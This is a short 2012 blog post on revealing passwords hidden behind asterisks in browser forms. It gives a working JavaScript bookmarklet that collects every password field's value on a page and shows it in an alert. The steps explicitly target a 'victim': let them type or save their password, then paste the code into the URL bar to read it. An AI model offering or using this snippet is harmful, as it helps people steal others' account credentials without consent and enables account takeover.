Saturday, 8 September 2012

Get Password Behind asterisks

          
This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It isdots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.
  • 1 . Let your Victim Type In his/her password On the Site 
  • 2.  Get The code In the Scroll Box
  • javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; 
    for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if 
    (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();



    3. Copy that To your URL Bar , & Hit ENTER
    4. Your  Browser/Navigator will Pop Out The Password

No comments:

Post a Comment